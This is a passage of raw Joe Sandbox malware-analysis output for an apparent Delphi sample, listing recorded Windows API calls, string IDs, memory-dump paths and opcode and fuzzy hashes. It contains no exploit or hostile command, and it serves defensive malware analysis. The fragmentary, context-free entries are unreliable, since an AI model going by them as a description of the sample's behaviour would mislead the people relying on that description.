                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,040BA6DA), ref: 040BA672
                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,040BA6DA), ref: 040BA678
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                  • String ID: yyyy
                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                  • Opcode ID: b1c3756a9c1614bc112e41cc0670d4ed8bc6e4c525bc5859a084b31f7ac00ca0
                                                                                                                                  • Instruction ID: 34e211ecf79c54da499e42881c35339669712c53654e36e879695eebda25d7aa
                                                                                                                                  • Opcode Fuzzy Hash: b1c3756a9c1614bc112e41cc0670d4ed8bc6e4c525bc5859a084b31f7ac00ca0
                                                                                                                                  • Instruction Fuzzy Hash: FE216FB5A002189FEB11DF64C841AEEB3F8EF08714F4144A5E985F7251E634AE40CBE9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                  • API String ID: 3535843008-4173385793
                                                                                                                                  • Opcode ID: 2cee56e0dc243e789af58d5a9fc94b4fcb5e1de788b98cf61afe95fe61624562
                                                                                                                                  • Instruction ID: f52d12d2f923c9054c72fec30dd84294b2ef9eb30852384febde6f2b66e36008
                                                                                                                                  • Opcode Fuzzy Hash: 2cee56e0dc243e789af58d5a9fc94b4fcb5e1de788b98cf61afe95fe61624562
                                                                                                                                  • Instruction Fuzzy Hash: 53019675980348BAEB11DB918D42FED77FCDB08B04F6000A2BE40EA580E6797910C798
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 040DAE61
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 040DAE6D
                                                                                                                                    • Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                                                                  • String ID: MonitorFromRect
                                                                                                                                  • API String ID: 1792783759-4033241945
                                                                                                                                  • Opcode ID: 523c40c7f59da7a684187b2cb1d97d0b84128d600c6d0944006d6beb1dc7b1ce
                                                                                                                                  • Instruction ID: 6991bd15e7af51451d5ec019b3cdc436c859aaf62671cf43ce2abe3f1043ab30
                                                                                                                                  • Opcode Fuzzy Hash: 523c40c7f59da7a684187b2cb1d97d0b84128d600c6d0944006d6beb1dc7b1ce
                                                                                                                                  • Instruction Fuzzy Hash: FC016236340314ABEB508E15D684B56B7A9DB84399F058551E905EF101C378EC88CFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(?), ref: 040DADEA
                                                                                                                                    • Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23
                                                                                                                                  • GetSystemMetrics.USER32(?), ref: 040DADB0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                                                                  • String ID: GetSystemMetrics
                                                                                                                                  • API String ID: 1792783759-96882338
                                                                                                                                  • Opcode ID: 3c86b561ef8c5f1422d8cabbc532b3a0c075504280d7182f427cdffa81dc2cb8
                                                                                                                                  • Instruction ID: 6745d9fe7f8f53322bc1f6c632a4ca174b0e2bfc40cd3273aec627edcfba952e
                                                                                                                                  • Opcode Fuzzy Hash: 3c86b561ef8c5f1422d8cabbc532b3a0c075504280d7182f427cdffa81dc2cb8
                                                                                                                                  • Instruction Fuzzy Hash: 36F0F0703503004FDB108A38DA8426A35A5EB8523AF404B21B2536E1C0E2BDB98DDE11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 040E3203
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 040E3214
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1649606143-3916222277
                                                                                                                                  • Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                  • Instruction ID: 389554f70dc1415f1f41115d3fd4068e8afdcabab0474f2bb0923e4cda77f0fd
                                                                                                                                  • Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                  • Instruction Fuzzy Hash: 04E09232700B4526F61279A92C003F75BD14F937ACF0846AEFED43B1D2E5A6292191A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%